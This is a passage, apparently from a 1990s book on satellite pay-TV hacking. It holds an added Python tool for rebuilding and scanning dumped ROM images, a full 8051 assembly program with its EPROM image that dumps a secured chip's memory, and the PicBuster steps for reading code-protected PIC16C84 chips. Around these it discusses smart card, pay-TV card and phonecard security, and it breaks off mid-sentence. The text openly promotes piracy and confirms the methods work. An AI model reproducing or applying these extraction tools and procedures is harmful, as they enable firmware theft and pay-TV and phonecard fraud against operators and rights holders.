:102520004F4F4F4F4F4F4F20202020202020202062 
:10253000202020202020202020206020202020205B 
:10254000202020202020202020202020202020208B 
:10255000202020202020202020202020202020207B 
:10256000202020202020602020202020202020202B 
:102570002020204D554C54592D4348414E4E454C3A 
:102580005320202020202020202020202020202018 
:1025900020206020202020202020202020202020FB 
:1025A000202020202020202020202020202020202B 
:1025B0002020202020202020202020202020607E7D 
:1025C000C050C051C052F550755100755200D552DF 
:0E25D000FDD551FAD550F7D052D051D050223F 
:00000001FF 
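The following Python script is an added example; it is not part of HACK.ASM 
or its original documentation. It covers the two jobs the procedure above 
leaves to the reader: turning the terminal program's capture log back into 
a ROM image, and checking an Intel HEX image such as the one printed above 
before it is burned. It assumes only what the listing shows: each dumped 
byte arrives as DPH, DPL, a colon and the byte in hex, and the dump loops 
over 0000h-1FFFh until the board is switched off. The third routine, which 
lists MOVC A,@A+DPTR / RET pairs in a dumped image as candidate trap 
addresses for another firmware version, rests on our reading of the GETTER 
routine and is labelled as such in the code. The sample capture and the 
corrupted record used in the demonstration are constructed.

```python
"""Companion tools for the EA-switch dump: added example, not part of the
original HACK.ASM or its documentation. Function names, the trap-address
heuristic and the sample data are our own constructions."""
import re
from collections import defaultdict

# HACK.ASM reports each byte as DPH, DPL, ':', byte (all hex), then LF CR:
#     0000:02
# The regex tolerates whatever line endings the terminal program logged.
CAPTURE_LINE = re.compile(rb"([0-9A-Fa-f]{4}):([0-9A-Fa-f]{2})")


def parse_capture(log: bytes):
    """Rebuild the secured EPROM image from a terminal capture.

    The dump loop never stops (after 1FFFh it wraps to 0000h), so a capture
    usually holds several passes over the same addresses. Every value seen
    for an address is recorded; addresses reported with more than one value
    (line noise, a dropped character) are returned separately so the caller
    re-runs the dump instead of trusting a corrupt byte.
    """
    seen = defaultdict(set)
    for m in CAPTURE_LINE.finditer(log):
        seen[int(m.group(1), 16)].add(int(m.group(2), 16))
    image, conflicts = {}, {}
    for addr, values in seen.items():
        if len(values) == 1:
            image[addr] = values.pop()
        else:
            conflicts[addr] = sorted(values)
    return image, conflicts


def parse_ihex(text: str):
    """Parse Intel HEX records, verifying every record's checksum.

    Returns (image, errors). image maps address -> byte for each data record
    that verified. errors lists (line number, reason) for records that are
    not hex, have a wrong length, fail the checksum, or overlap an address
    already filled, which is what a mis-read address digit in a hand-copied
    image looks like.
    """
    image, errors = {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line.startswith(":"):
            continue
        try:
            rec = bytes.fromhex(line[1:])
        except ValueError:
            errors.append((lineno, "non-hex character"))
            continue
        count = rec[0] if rec else -1
        if len(rec) != count + 5:        # count, 2 addr, type, data, checksum
            errors.append((lineno, "length field does not match record"))
            continue
        if sum(rec) & 0xFF:              # all bytes incl. checksum sum to 0 mod 256
            errors.append((lineno, "checksum mismatch"))
            continue
        addr, rtype = int.from_bytes(rec[1:3], "big"), rec[3]
        if rtype == 1:                   # end-of-file record
            break
        if rtype != 0:
            errors.append((lineno, f"unsupported record type {rtype}"))
            continue
        for i, b in enumerate(rec[4:4 + count]):
            if addr + i in image:
                errors.append((lineno, f"overlaps address {addr + i:04X}"))
                break
            image[addr + i] = b
    return image, errors


def find_movc_ret(image: dict):
    """List candidate trap addresses in a dumped 8051 image.

    GETTER calls into the secured program with A = 0 and DPTR pointing at
    the wanted byte, and expects A back holding that byte. The shortest code
    that behaves this way is MOVC A,@A+DPTR (93h) followed by RET (22h), so
    we scan for 93 22 pairs. That the listing's trap addresses are such
    sequences is our reading of GETTER, not a statement from the original.
    """
    return sorted(a for a, b in image.items()
                  if b == 0x93 and image.get(a + 1) == 0x22)


if __name__ == "__main__":
    # Constructed capture: two passes, one byte disagreeing between them.
    capture = b"0000:12\n\r0001:20\n\r0002:61\n\r0000:12\n\r0001:2F\n\r0002:61\n\r"
    img, bad = parse_capture(capture)
    print(f"{len(img)} good bytes, conflicts at {[f'{a:04X}' for a in bad]}")
    # First record of the printed image (its checksum verifies) plus EOF.
    rom, errors = parse_ihex(":0B0000001220619020F512208980FE84\n:00000001FF\n")
    print(f"{len(rom)} bytes from Intel HEX, errors: {errors}")
```

Run parse_capture over the log the terminal program saved and parse_ihex 
over any image copied by hand before burning it; a record that fails its 
checksum or overlaps another must be corrected, not burned.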
A Later Version Of The 8051/8052 Popper 


A more streamlined version of this hack has been circulating on BBSes and 
internet sites over the last year or so. The code is more streamlined in that it 
does not have the display routines. It is also somewhat better documented, 
though the original documentation is in German. This file also includes a 
GIF of the circuit used for the popping. 

The EPROM image for this file is for a 27C256. The circuit uses the HCT 
version of the 74373. The supply voltage for the circuit is 5 Volts and the 
Vcc pins and supply decoupling capacitors are not shown. 


The comments in the disassembly have been approximated from German. 
Basically the routines are largely similar to those in the previous example. It 
is a barer and more efficient implementation in that it does not include the 
display routines of the previous example. 


$NODEBUG
$GEN

SETEA   BIT     P1.7            ; P1.7 is used to drive the EA line

        CSEG AT RESET
        ORG     0
        JMP     START_UP

        ORG     2000H           ; Start

START_UP:
        MOV     SP,#60H         ; Stack from 60H to 7FH
        MOV     PSW,#0          ; Clear PSW
        MOV     P1,#0FFH        ; Set all port pins to 1
        MOV     P3,#0FFH
        CALL    INIT_RAM        ; Initialise RAM
        CALL    INIT_SFR        ; Initialise special function registers
        CLR     SETEA           ; Clear EA
        NOP
        NOP
        NOP
        NOP
        SETB    EA
        MOV     DPTR,#0         ; ROM address = 0000 (start)

COPYLOOP:
        CLR     A               ; Index = 0
        MOVC    A,@A+DPTR       ; Load byte from ROM
        CLR     TI              ; Clear transmit flag
        MOV     SBUF,A          ; Move byte to transmit register
        JNB     TI,$            ; Wait until it has been sent
        INC     DPTR            ; Increment pointer
        MOV     A,DPH
        CJNE    A,#20H,COPYLOOP ; Repeat for 0000-1FFFH
        NOP
        JMP     $

INIT_RAM:
        MOV     R0,#8
        CLR     A               ; Initialise RAM 08-5F
FILL_RAM:
        MOV     @R0,A
        INC     R0
        CJNE    R0,#5FH,FILL_RAM
        RET

INIT_SFR:
        CLR     F0              ; Clear status flag
        CLR     TR0             ; Timer 0 off
        CLR     TR1             ; Timer 1 off
        CLR     IE1             ; Clear INT1 flag
        CLR     IE0             ; Clear INT0 flag
        SETB    IT0             ; INT0 on negative edge
        SETB    IT1             ; INT1 on negative edge
        MOV     PCON,#0         ; Normal baud rate (SMOD = 0)
        MOV     TMOD,#00100001B ; T1 = 8-bit auto-reload, T0 = 16-bit
        MOV     SCON,#01000000B ; 8-bit UART, T1 is the baud rate generator
        MOV     TL1,#0FDH       ; Baud rate reload value, low (9600 bps)
        MOV     TH1,#0FDH       ; Baud rate reload value, high (9600 bps)
        CLR     TF1             ; Clear T1 flag
        CLR     TF0             ; Clear T0 flag
        CLR     EX0             ; INT0 disable
        CLR     EX1             ; INT1 disable
        SETB    TR1             ; T1 start
        CLR     ES              ; Serial interrupt disable
        CLR     REN             ; Receiver disable
        RET

        END


Relevant Fragment Of EPROM Image 


:1020000075816075D0007590FF75B0FF12202F129A 
:102010002038C29700000000D2AF900000E493C2C5 
:1020200099F5993099FDA3E583B420F10080FE78FD 
:1020300008E4F608B85FFB22C2D5C28CC28EC28B00 
:10204000C289D288D28A75870075892175984075B2 
:102050008BFD758DFDC28FC28DC2A8C2AAD28EC261 
:10206000ACC29C22FFFFFFFFFFFFFFFFFFFFFFFF50 


PicBuster - Popping The PIC16C84 


For a long time, some of the most frequently asked questions on the 
Special Projects BBS were about Picbuster. Was it a program? Was it a 
device? Did it really exist? Essentially it was a Welsh Poet - Dai Ode. In 
other words a diode. 


The PIC16C84 has a design flaw that allows the contents of the EEPROM 
to be dumped out even after the EEPROM has been secured with the code 
protection option. This knowledge was initially closely guarded and spoken 
about in hushed tones. In April 1995 however, the details of the PicBuster 
procedure were released on the internet. From then on it was downhill for 
the PIC16C84. This chip was the foundation of the European pirate smart 
card industry. With the information released on the internet, everyone knew 
how to pop the PIC. The result was that the code from every PIC16C84 
hack on VideoCrypt 09 and D2-MAC was floating around on the internet 
and the BBSes within a few days. There were no more secrets about the 
PIC16C84. 
Up to that point, the standard method of popping a PIC was to actually 
remove the top of the chip and re-engineer the fuse. This technique was 
initially used on the EPROM OTP versions of the PIC microcontrollers such 
as the PIC16C54 and the PIC16C57. These are EPROM versions and the 
PicBuster method does not work on these chips. However the PIC16C84 
uses EEPROM. 


Ordinarily things like the PicBuster are not supposed to work, as they push 
the chip beyond the published maxima. The standard result when the fuses 
are reset is that the complete memory of the PIC16C84 is reset with them. In 
the normal programming mode there is a large difference between the 
programming voltage (approx 13.8 Volts) and the supply voltage (5 Volts). 


With the PicBuster technique, the difference between programming voltage 
and supply voltage is approximately 0.6 V, the forward voltage drop across 
the diode (0.6 V to 0.7 V). This 0.6 V differential may not be enough to reset 
the entire memory but is enough to allow the configuration fuses to be reset. 
It seems that the configuration fuses are the first to be reset. 


The process of reading the chip is relatively simple - the protection fuse is 
rewritten so that the chip memory can be read out. The programmers will 
return an error message but this is ignored. The protection fuse overwrite 
has to be executed a few times. 


Some problems have been observed with chips that have been subjected to 
the picbusting process. When trying to reprogram them, the erase 
procedure does not completely erase the memory contents with the result 
that the programming fails. The supply voltage is then reset to 5 Volts and 
the programmer is powered down. After a while, the programmer is 
powered up and the memory contents of the chip can be read. It is really 
that simple. 


The majority of PIC16C84 programmers in operation in the Blackbox 
industry are based on the serial method of programming the chip. There are 
a number of designs used but the most popular are the Henk Schaer design 
and the David Tait design. These designs are available on the internet and 
most BBSes dealing with satellite television. Both are easily constructed and 
are low cost options. I have used the Schaer design to test the PicBuster 
process and it worked extremely well. 


The PIC16C84 is still widely used. In some applications it is used to control 
electronic locks such as those used on some of the more up-market cars. 
There was a court case in the UK in 1994 where the defendant was 
convicted for having in his possession a device that snatched the RF data 
from these electronic keys and replayed it to open the locks. 


The use of PicBuster could be dangerous if it were shown that there was a 
backdoor code (bad pun) that could be used by garages in the event of the 
car owner losing his electronic key. Of course it also means that someone 
could crack one of the electronic key fobs and obtain the codes illegally. 


Arizona Microchip seem to be implementing some sort of modification to the 
PIC16C84 die to prevent the PicBuster technique from working. The new 
version of the chip is designated as PIC16C84A. However this is relatively 
futile when considering the vast number of pirate PIC16C84 based 
smartcards that are still vulnerable to this hack. The pirate D2-MAC 
EuroCrypt-M cards using this microcontroller are being sold at a price less 
than the retail price of the PIC16C84. 


It is not known if the new version of the chip will prevent the sort of 
widespread piracy of pirate code that has plagued the Blackbox industry in 
Europe. In all probability the newer version will be popped. But this time the 
method of popping the code will not be released on to the internet. Of 
course some live in eternal hope. 


PicBuster Details As Released On Internet 


PicBuster 

The Pic chip (PIC16C84) can in fact have its program and data 
memory read after the config fuses have been set to code protection 
on. 

Try the following: 

Write some code to the chip with the code protection set to "ON". 
Read back to verify that the protection has indeed come on. 

Now set Vdd ( pin 14 ) to Vpp-0.5v, (Programming voltage less 
0.5V). 

Set config fuse to "OFF" and reprogram config fuse. 

Now set Vdd back to normal, +5v. 

Power off the programmer. 

Wait 10 to 20 sec. 

Power back on the programmer. (VDD at + 5V) 

Read the Pic.... and hey presto, data in unprotected format should 
now be available. 


The details above are those given in the original Usenet posting. The 
procedure as outlined above works. Most of the programmers in operation 
can be modified by cutting a track and wiring in a switch that selects 
between (Vprogram - 0.6 V) and 5 V for the PIC16C84 positive supply pin. 
There is a somewhat cyclical nature to security. The original system 
designs were based on the secure embedded microcontroller principle. The 
smart card changed that. It was part of the detachable secure 
microcontroller principle. Neither of these systems remained secure but the 
smart card based systems allowed for a simple, if costly, upgrade path. 
Newer system designs tend to integrate both elements. The best example of 
this is the dial-out modem option on the smart card based DirecTV system. 


However the smart card is not the ultimate solution in system security. In 
satellite television scrambling systems, they have become a licence to print 
money. Unfortunately for the channels that licence has been granted to the 
pirates. 


Prior to the introduction of smart card based systems, piracy was a 
box-shifting exercise. The boxes, (ie the descramblers) were heavy, 
occupied a lot of space and were difficult to transport throughout Europe or 
the United States. The smart card changed all of that. 


With the smart card based systems, it was possible to transport as much 
pirate product in a briefcase as would have previously required a couple of 
articulated trucks. The benefits of miniaturisation also worked for the pirates 
and hackers. 


This miniaturisation of the pirate device facilitated piracy in Europe on a 
scale seldom previously equaled. The channels introduced systems based 
on this new technology, thinking that it would reduce piracy. The people 
responsible for this lemmings’ rush by the channels are still around 
unfortunately. Perhaps it is more unfortunate for the channels than the 
pirates. 


The same thought patterns can be seen in the DVB venture. The DVB 
specification, if anything will facilitate piracy. It seems that the DVB even 
have problems on standardising the encryption overlay. They may give 
themselves grand titles and claim to be experts on piracy but they are not. 
They never were. And they probably never will be. 


The reason for this is simple. Having never worked in the pirate side of the 
Blackbox industry, they cannot think like pirates. According to Sun Tzu's 
“The Art Of War’, you should know the enemy as you know yourself. These 
people seem to spend too much time squabbling to even know themselves. 


This chapter deals with smart cards. Or to be more precise, it deals with the 
technology and the hacks. Some of the material here is drawn from the 
previous versions but there is new material. Some of it, the hacks perhaps, will 
cause embarrassment to the bureaucratic automata that traipse around 
claiming that their systems are totally secure. However there are few people 
these days who will argue that smart cards are secure. Only fools believe 
that smart cards are invincible. 


Some people may question my motivation for including information on 
telephone card hacking. Perhaps they may consider it vengeance for high 
telephone bills. The reason is more mundane. The original Pay Per View 
specifications of some systems included a combination of these memory 
cards and real smart cards. The 8052 in the VideoCrypt decoder has 
routines that handle both smart cards and memory cards. Of course the 
recent PPV hack in March has put the whole idea of PPV on VideoCrypt in 
doubt. Even Sky and News Datacom were not stupid enough to use 
memory cards as part of their European implementation. 


How Smart Is "Smart"? 


Smart cards are relatively cheap and ultimately disposable technology. The 
concept of disposable technology is a particularly modern one. Most 
countries in Europe have smart card payphone cards. There are of course 
countries like the UK that are using optical cards but British Telecom has 
introduced memory cards. In the USA there are some test programs using 
memory cards for payphone applications. 


The problem with smart cards is that the term has become too generalised. 
It has to cover a few types of card. The phone card is generally a memory 
card but for the purposes of marketing, it becomes a "smart card". 


Perhaps the best definition of a smart card is a card that contains a 
microprocessor and memory. The memory cards used for pre-paid applica- 
tions are, in this light at least, best viewed as dumb cards. 


There are essentially two classes of smart cards; contactless and contact. 
The contact type smart card requires direct electrical connection to the card 
reader. In many respects this is the cheaper option. The interface circuitry is 
kept to a minimum. 


The contactless smart card does not require a direct electrical connection to 
the card reader. Instead it uses a set of tuned circuits to pick up the signals 
from the card reader. Essentially three frequencies would be used. One 
frequency would be rectified to provide the card's DC supply voltage and the 
others would be used for data transmission. 
Such complexity is not really suitable for Pay television applications. The 
cost is high and Pay television applications are often more concerned with 
getting the most efficient technology for a low price. 


The contact type of smart card requires direct electrical connection between 
the pads on the card and the decoder socket. There is an ISO specification 
governing the construction and connection protocols of smart cards, 
ISO 7816. Much of the information on the card protocols can be found in 
part three of this document. 


The ISO Specifications - The Pads & Card 


The connector specifications for the contact SMART card have been 
established as an ISO standard. The ISO standard specifies eight connec- 
tions of which only six are actively used. Many of the SMART cards used for 
payphones and banking applications follow the pattern that appears in the 
diagram. The typical payphone card is an EPROM memory card rather than 
a smart card. 


VideoCrypt's card does not look like it follows the pattern but it does have 
the same six connections on the connector array. Indeed the actual shapes 
of the pads on a card are an indicator of the manufacturer of the card. 


There are also some strict guidelines covering the position of the pads on 
the card and indeed the actual dimensions of the card. Most of the pirate 
cards are about twenty millimetres longer than the official cards. This is to 
facilitate the use of surface mount chips. Some of the more recent decoders 
and IRDs have recessed card slots and this would cause problems as the 
chip would prevent the card from being fully inserted. 


SMART Card Structure 


The structure of the card is deceptively simple. It consists of a microprocessor 
and memory. This description also fits the microcontrollers used to control 
receivers and video recorders, and indeed the same types of chips are 
used in these applications. The type of memory used can vary. It generally 
involves Read Only Memory (ROM), Erasable Programmable Read Only 
Memory (EPROM), Electrically Erasable Programmable Read Only Memory 
(EEPROM) and Random Access Memory (RAM). 


The information stored in the ROM is fixed and cannot be altered without 
changing the design of the SMART card. The main routines that would be 
included in the card ROM are the card interface routines and other 
housekeeping functions. 
The ISO Smart Card Standard Connector Functions (figure). The eight 
contacts are labelled in the diagram as follows: 

    Supply voltage, +5 V                 Ground, 0 V 
    Memory R/W (programming) voltage,    Reset 
      typically 21 V to 25 V 
    Bidirectional serial data port,      Not assigned 
      9600 baud 
    Clock signal                         Not assigned 

Cross Section Of Smart Card (figure). The smart card chip sits on a small 
PCB in a recess in the card, with the connector array forming the outer 
face of the PCB; the chip is covered in epoxy resin and the assembly is 
moulded into the plastic card. 
The information in the EPROM generally has to be erased with ultra violet 
light. This would imply that once the card has been programmed, the 
information cannot be erased in the card. Perhaps as a result the number of 
times that a series 05 (and before) Sky card could be killed and reactivated 
was limited. However the EEPROM versions are not limited in this respect. 
The EEPROM is more usable in SMART cards for one specific reason - it 
can be reprogrammed in the card. Of course it is now extremely dangerous 
to try and reprogram a card's EEPROM over the air. If the card has been 
hacked then the hackers would be able to watch the new data arriving and 
create a fix. 


The actual card type used by Sky currently is a Siemens 8051 type. Prior to 
this card issue, the 10, they used a Motorola 6805 type. It is not known at 
this stage what the version used by D2-MAC EuroCrypt is but it is believed 
to be similar. However the Sky version is EEPROM whereas most of the 
cards used on TV3, TV1000 and FilmNet are EPROM. 


From this information, a memory map of a VideoCrypt SMART card can be 
guessed. The ROM area of the memory is the area where the main 
operational program is stored. The EEPROM area contains the algorithms 
and keys, the service data, the pay per view data, the card identity data and 
the billing period data. The RAM is used for temporary storage of data 
during processing. 


Due to the Vampire hack and the fact that all pirate 09 Sky cards had to 
have an image of the official card memory, this has become one of the most 
documented cards in history. There are complete disassemblies of the code 
available on BBSes and the internet. 


The EEPROM contains the enabling data for each channel that the card 
user has paid for. The data entry for each channel would consist of a 
channel identifier, a billing period, a regional identifier, key data and 
authorisation data for the channel. 


The design of a SMART card is complex and prototyping can take a few 
months. The ROM in the card has to be mask programmed. This essentially 
means that the programs to be stored in the ROM are designed as part of 
the chip. The procedure is straightforward. 


The programs to be included in the ROM are developed on a SMART card 
emulator. This is a microprocessor development system that is configured 
to imitate a SMART card. It is hooked to a personal computer. The program 
developer will write the programs on the computer, test them, and if they run 
successfully, load them into the SMART card emulator. The SMART card 
emulator will then be plugged into a decoder to ensure that the programs 
work. 


The programs will then be supplied on floppy disc to the chip manufacturer. 
The manufacturer will program an EPROM with the programs and send it to 
the card issuer for verification. Once the EPROM is checked, the 
manufacturer will then produce the chips in sample quantity. These chips 
will also be tested for correct operation. The chips can then be mass 
produced. 


The chips are glued to a printed circuit board substrate with epoxy resin. 
The connection pins on the chip are wired to the connections on the 
substrate. The substrate connections are then wired to the connector array. 
The actual plastic card is injection moulded with an indent for the chip. The 
chip is then glued into the indent. The card is then tested to ensure that it is 
operational. 


The SMART card at this stage will only have the bare minimum of data. 
There will be no service data in the EEPROM. This data is programmed into 
the card by the card issuer. In VideoCrypt's case, the personalisation stage 
would be carried out at News Datacom’s Maidenhead facility. 


Perhaps the most important aspect of this operation is testing. The 
programs in the smart card must undergo extensive testing before they are 
released on to the market. This test stage is essential as a problem that 
would require a new card issue may occur when the card is in the market. 
Normally the test versions of the cards appear approximately three months 
before the new card issue commences. 


A definite trend in smart card security has been seen with News Datacom 
and Sky. The issue 10 card, the 0A, has used two chips; the smart card 
microcontroller and an Application Specific Integrated Chip (ASIC). This 
seems to be a response to the fact that smart card microcontrollers are no 
longer considered secure enough for use in satellite television applications. 


Indeed the hackers and pirates had completely popped the EEPROM and 
ROM of the 10 card by the time that Sky had activated it on 31/10/1995. It 
was the ASIC that had given Sky a reprieve of some five months before the 
hack finally hit the market. 


It is the ASIC that is currently causing problems for people wishing to 
implement a SEASON type program. The best probable solution is an ASIC 
emulator that connects via the parallel port. 
A Smart Card Memory Map 


Masked ROM 

This section contains the housekeeper 
routines and the basic protocol routines. 


EEPROM 

This section holds most of the important 
data. It also typically holds the main 
core algorithms and subscription 
details. 


RAM 

Used as temporary storage area. 


Simplified Smart Card Chip Structure 

[Figure: the microprocessor connected internally to the EEPROM, RAM and 
Masked ROM, with external lines for Data, Reset, Clock, 5V0 and 0V Gnd] 


The smartcard microcontroller is generally a secured version of an 
existing microcontroller. The best example of this was the Sky 09 
and Sky 07 microcontrollers which were developments of the 6805 
microcontroller. 


A typical modification is a bit scrambling of the data in the memory of the 
smartcard. This is achieved by modifying the addressing lines on the 
chip during the design process. It was used in the Sky 09 card. 
SMART Card Operation 


The SMART card is essentially a partial computer on a card. It is a partial 
computer because it requires other circuitry and inputs to operate. The first 
requirement is supply voltage. This is generally a 5 Volt DC supply. 


The second requirement is a clock signal. This is a stable frequency square 
wave of 5 volts amplitude. This frequency is derived from a crystal in the 
decoder. The frequency used in the VideoCrypt card is 3.57 MHz. Higher 
clock frequencies can be used. 


The third requirement is a reset line. This is used to initiate the programs 
and routines in the card when the card is inserted into the socket. 


The fourth optional requirement is the EPROM voltage. The EPROM 
programming voltage is high, typically over twenty volts. This voltage is only 
on for a few milliseconds every three seconds. The chip would generate too 
much heat if it was continually fed with high voltage. The EEPROM versions 
do not require the 21 Volt programming voltage. The programming voltage 
required by the card is signalled in the "Answer To Reset" (ATR) block of 
data transmitted by the card. 


The fifth requirement is the data port. The data flows to and from the card 
on one line. It is serial data. This port would be connected to the RAM in the 
card. The serial data would be clocked into the RAM. The microprocessor 
on the chip would then read the data in a parallel format. In the VideoCrypt-1 
system, the data flows at 9600 Baud. The VideoCrypt-II and DirecTv system 
cards initialise at 9600 Baud but then switch to 38400 Baud for the data 
transfer. 


When the card is inserted into the decoder, the reset pin is activated. This 
zeroes the RAM and causes the microprocessor to select the boot-up 
program. This next routine in the program will verify that the card is valid for 
the period. 


The card will then read the data from the decoder. This data, along with 
service data from the EEPROM, will be used in the decryption algorithm 
stored in the EEPROM. The product of the decryption algorithm will then be 
passed back to the decoder. 


In the VideoCrypt system the information flowing to and from the smart card 
is useful in that it contains the addresses for cards being authorised and 
deauthorised as well as the actual decryption key. Other systems such as 
D2-MAC EuroCrypt-M and DSS have more complex packet structures. It 
can take some time to actually build up a knowledge of the packet 
structures. Of course this was not necessary with the D2-MAC EuroCrypt-M 
system as it was a published standard. 


This data is passed via the 8052 Housekeeper microcontroller to a secure 
microcontroller, the ZC404044 or ZC404047, where it is then used in a 
further algorithm to generate the seed for the cutpoint generator at the start 
of every field or frame. The secure microprocessor is actually a Mask ROM 
version of the 6805 microcontroller. Of course this chip has been popped 
and the program is on most BBSes and Internet sites dealing with satellite 
television. 


Pay Per View is extremely easy to implement with a SMART card. The card 
user will purchase a number of credits or tokens each billing period. A 
typical number would be 99 tokens. The SMART card would be 
programmed so that the token counter would read 99 tokens. Whenever the 
user wanted to watch a PPV film or event, a message would be shown on 
screen stating the number of tokens that the event is valued at. To watch 
the programme, the user would press the authorise or pay button on the 
front of the decoder. The decoder would then decrease the token register by 
the correct amount. 


Each service could have a token register. The actual operation of the 
counting mechanism would be more complex. It would be too easy to 
intercept the token count value and substitute a continual 99 tokens. This 
type of hack is commonly used in computer games and is known as an 
"Infinite Lives POKE". The original PPV algorithm for VideoCrypt lies mainly 
in the 8052. With the collapse of security over the issue 07, 09 and 10 
cards, News Datacom has had to change their PPV protocols to a more 
secure format. 


The new protocol seems to be pre-booked PPV. The subscriber rings up 
the subscriber management centre and quotes his subscriber number. His 
card is then activated for that particular PPV event over the air. The PPV 
event is assigned a pseudo channel ID so that a card only has to be enabled 
to access that channel. When the PPV event is over, that channel ID is 
dispensed with. 


With the 10 card there are plans to introduce fully PPV channels later in 
1996. The subscriber will, according to some sources, have to pre-book the 
events. The first public PPV event on VideoCrypt-1 was hacked. It may be 
the case that the PPV events planned for later this year will also be hacked. 
SMART Card Security And Addressing 


The VideoCrypt cards are valid once they leave the subscription centre. 
This means that they can be used in any VideoCrypt decoder. They can be 
deactivated over the air by Sky. The Quickstart cards are not valid until they 
have been activated by Sky. However Sky discontinued the Quickstart 
program in 1995 because they were losing too many smart cards to the 
hackers and pirates. 


In the VideoCrypt system, the kill signals can be global in that they knock 
out all channels or they can be channel specific. A sequence of packets with 
the kill instructions containing the IDs of the cards to be deactivated is 
transmitted continually. This sequence of kills is known as the Blacklist. 


When the kill occurs, a section of the EEPROM in the card is overwritten so 
that when the card is inserted into the decoder, it will not work on the 
relevant channels. In order to reactivate the card, the programme provider, 
Sky, transmits the card's ID as part of the Whitelist sequence. This is a 
sequence of packets that include the turn-on instruction and the IDs of the 
cards to be turned on. However the Whitelist is not continually transmitted. 
It changes as subscribers have their cards updated by ringing subscriber 
management. With the Blacklist, the ID numbers to be killed are 
continually transmitted. 


With the 09 card, Sky had included a Drop-Dead code. By writing to a 
particular area of EEPROM controlling the communications protocol it was 
possible to send the card into an infinite loop. This code was referred to as 
the Code 99 ECM in the USA with the DSS card and as the Drop Dead ECM 
when used on the 09 card. The common factor here is that News Datacom 
did the security for both systems. 


The more recent trends in systems using SMART cards are towards 
sending the cards to the subscribers in an unactivated state. The subscriber 
has to ring the subscriber management centre to have the card activated 
over the air. This method of addressing is more time consuming and thus 
less economical. It is basically a trade off between medium security and 
better security. 


It appears that all of the 07 and 09 VideoCrypt cards were shipped with the 
keys for all of the channels. All the channels used a common algorithm and 
keytable. In terms of security it was disastrous and utterly stupid. It meant 
that the card could be activated by a Phoenix program to do all channels. 
Furthermore it ignored a potential firewall that could have limited the piracy 
to a channel by channel basis by having the relevant keys downloaded over 
the air rather than being already resident in the card. 
D2-MAC EuroCrypt on the other hand is better in terms of key handling. It 
has a separate key set for each channel which it can change periodically. If 
the card does not have a valid management key it means that it can not be 
properly updated. The algorithm too is common in this system. 


Theoretically during personalisation, the subscriber's channel allocations 
are entered into EEPROM. Therefore the subscriber will only be able to 
access the channels for which they have paid. Other channels will appear 
as being blocked. 


The VideoCrypt system is based on the Exclusion Principle. All of the 
activated smart cards on the system are active until they receive a kill 
signal. It is definitely not the most secure format as it is possible to get a 
card and keep it out of the decoder for a few months. As the kill signal is 
only transmitted aperiodically, the chances of the card being killed are 
reduced. This problem may have been cured with the 10 card issue. 


Of course the fact that the VideoCrypt 07, 09 and 10 card issues have been 
hacked has destroyed confidence in VideoCrypt at least for this card issue. 
The only reason that some channels continue to use it is that there is no 
alternative scrambling system. VideoCrypt has a stranglehold on English 
language satellite transmissions. 


The main problem with the 09 issue was that the system’s card addressing 
and activation was cracked. It was therefore possible to reactivate the dead 
cards. Indeed given the procedure of the channel activation on the cards it 
was possible to selectively activate channels on a card. 


The program for activating the 09 Sky cards was known as the Phoenix 
program. This term is now used to describe any such program that activates 
channels on a smart card. It is dealt with in depth in Chapter 7. 


Memory Cards 


Memory cards are perhaps the very simplest form of smart cards. They are 
not actually smart in that they do not contain a microcontroller. They are 
basically memory with some addressing circuitry. In effect they are serial 
memory chips and as such, are easily read and programmed. Of course it 
follows that they are also, much to the disgust of the telecom companies, 
easily emulated. 


In the current pirate environment, the memory cards do not have enough 
security to be widely used in satellite television applications. The original 
patent for the VideoCrypt system referred to the memory cards but it did not 
consider them to be secure enough to be used on their own. 


The commonest application of memory cards at present is as prepaid 
telephone cards. The vast majority of these telephone cards are straight 
memory cards. To put it simply, they are 256 bit serial EPROMs. 


Newer versions are filtering into the market. These new versions are 
EEPROM however the vast majority of telephone cards are only EPROM. 
The reason for this is that the EPROM cards are exceedingly cheap. 


One of the first companies to introduce the phone cards was France 
Telecom. Like most pioneers, it ended up with arrows in its corporate back. 
They were, in some senses, victims of their own success. Of course other 
national telecoms companies followed France Telecom. These companies 
tend to be money-driven hulks that care little for the technology or the 
unfortunate telecom engineers and technicians who have to implement their 
strategies. 


The logic behind Telecom Eireann's choice of a totally compromised card 
system was, to say the least, commercial. The people making the decision 
did not seem to consider smart card piracy a threat. It would be a good 
conclusion to say that they were businessmen rather than technologists. 


The unofficial story about Telecom Eireann's selection is that some 
management people at a seminar in France saw the benefits of the concept 
of phonecards when in a hotel lobby trying to make a phonecall home. On 
the spot, they decided that the idea of phonecards was a good thing. No 
more fumbling for strange slippery coins to shove into slots, the phonecard 
was the wave of the future. And it was simple to use. 


The deals were done and Telecom Eireann implemented their network of 
chip card based phones. From a physical security viewpoint it was actually a 
good move. The chip card telephone does not have to store cash. This 
means that the risk of the telephone being vandalised is somewhat reduced. 
It also opened up a new source of advertising income. Advertising space on 
phonecards was being sold so that companies and events could be 
advertised with their own phonecard. There are even people who collect 
such cards. But in the final analysis it is a disaster in terms of security. 


Pirate phonecard emulators have been appearing around Europe. In 
Ireland, phonecard emulators based on PIC16C84s have been seen though 
their use has been sparse. It is believed that some security people working 
at destroying the piracy networks have in the past attempted to set up 
hackers by claiming that these hackers were involved in phonecard 
piracy. 
Example Of Phonecard Memory Map 


Bits 00 to 95 are the manufacturer/issuer area. This area is fuse 
protected and cannot be overwritten. 


[Figure: the 96-bit manufacturer/issuer area shown as rows of bits, with the 
fields Manufacturer Identifier, Application: Phone Card, Currency Identifier, 
Credits Value (50), Telco Specific Information and Country Identifier 
(Ireland)] 


Credit Tokens Area 


Bits 96 to 255 make up the programmable area of the card. These 
bits are set when the phone deducts a Credit from the card. As this area is 
EPROM, these bits cannot be reset without wiping everything. The actual 
time and effort involved in taking the wafer out of the card and removing 
the epoxy resin is not worth it. 


It is possible to read these memory cards as serial EPROMs. Radio 
Plans published a number of good articles on the subject a few years 
ago. 


[Figure: the 160-bit credit tokens area shown as rows of bits, with set bits 
marking the credits already used] 


The PPV version of a memory card may not be that different from 
the model above. The manufacturer area of the card may well hold the 
key tables for the programmes. The Credits area may also hold a set 
of key tables for the relevant programmes. Of course as the decoder 
uses the key tables for each programme, then that particular table 
would be overwritten. It is unlikely that the memory cards would be 
used on their own for PPV applications. Even the VideoCrypt patent 
application mentions how insecure they are. 
Of course the hackers were not involved in pirate phonecards. The logic 
was apparent to anyone who knew about piracy. The pirate Sky and 
D2-MAC cards were on sale for about £40. A phonecard emulator, using a 
